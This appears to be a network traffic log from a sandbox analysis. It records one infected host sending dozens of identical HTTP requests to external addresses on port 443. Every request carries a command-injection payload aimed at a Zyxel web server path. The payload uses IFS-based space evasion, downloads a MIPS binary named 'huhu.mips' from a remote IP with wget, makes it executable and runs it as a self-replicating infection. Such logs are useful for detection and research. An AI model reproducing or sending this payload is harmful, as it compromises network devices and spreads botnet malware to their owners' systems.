                                                      Feb 2, 2024 06:36:05.910502911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7517192.168.2.145555468.150.26.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910531998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7518192.168.2.144248457.214.170.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910566092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7519192.168.2.1433136165.22.82.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910625935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7520192.168.2.146017460.194.230.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910651922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7521192.168.2.145446492.69.205.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910692930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7522192.168.2.145697418.12.84.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910737038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7523192.168.2.1459460158.46.118.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910768032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7524192.168.2.144664681.90.11.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910808086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7525192.168.2.1447882112.91.130.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910836935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7526192.168.2.143344039.121.221.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910861969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7527192.168.2.1437884171.209.46.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910887957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7528192.168.2.1453118104.32.64.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910938978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7529192.168.2.1440454153.175.245.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.910962105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7530192.168.2.1433528167.165.8.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911006927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7531192.168.2.144418443.175.75.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911032915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7532192.168.2.144009259.227.195.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911082029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7533192.168.2.1451060152.81.172.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911098957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7534192.168.2.145954045.53.132.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911165953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7535192.168.2.145043675.121.227.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911189079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7536192.168.2.1437130119.251.174.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911243916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7537192.168.2.1449166111.196.171.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911262035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7538192.168.2.1438072139.32.14.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911288023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7539192.168.2.1453336194.54.230.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911346912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7540192.168.2.1458922137.6.235.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911395073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7541192.168.2.143831038.63.158.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911457062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7542192.168.2.1434054218.173.82.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911489010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7543192.168.2.1437268199.230.56.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911534071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7544192.168.2.145564853.40.251.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911561012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7545192.168.2.1438898171.72.169.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911593914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7546192.168.2.1446814108.109.21.146443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911628962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7547192.168.2.144943061.129.55.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911664963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7548192.168.2.1441878155.41.57.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911695004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7549192.168.2.1443042204.194.53.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911720037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7550192.168.2.1457776135.91.85.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911762953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7551192.168.2.1439190108.255.199.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911819935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7552192.168.2.1454700114.141.252.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911864996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7553192.168.2.1438208222.101.59.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911902905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7554192.168.2.1433766146.129.141.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911942959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7555192.168.2.145913471.67.106.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.911997080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7556192.168.2.1443264149.237.246.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912034988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7557192.168.2.1439878136.177.77.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912066936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7558192.168.2.145530696.14.93.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912123919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7559192.168.2.144978646.231.188.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912161112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7560192.168.2.143596678.229.244.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912210941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7561192.168.2.1437798121.113.124.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912237883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7562192.168.2.1440710202.135.62.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912281990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7563192.168.2.144935881.233.83.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912307024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7564192.168.2.1438792196.49.133.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912336111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7565192.168.2.1433372216.21.173.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912369013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7566192.168.2.1459808181.152.24.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912421942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7567192.168.2.1441632193.51.57.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912451982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7568192.168.2.1452380170.242.158.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912487984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7569192.168.2.1435938159.205.152.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912513018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7570192.168.2.1445828109.158.253.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912569046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7571192.168.2.143636436.199.151.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912610054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7572192.168.2.1442880199.94.210.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912632942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7573192.168.2.1438530157.37.92.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912682056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7574192.168.2.1446402121.15.165.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912702084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7575192.168.2.1443486164.133.127.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912759066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7576192.168.2.144406080.1.183.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912782907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7577192.168.2.144644677.223.86.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912818909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7578192.168.2.145429858.166.63.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:05.912878990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7579192.168.2.143489644.150.99.106443
                                                      TimestampBytes transferredDirectionData
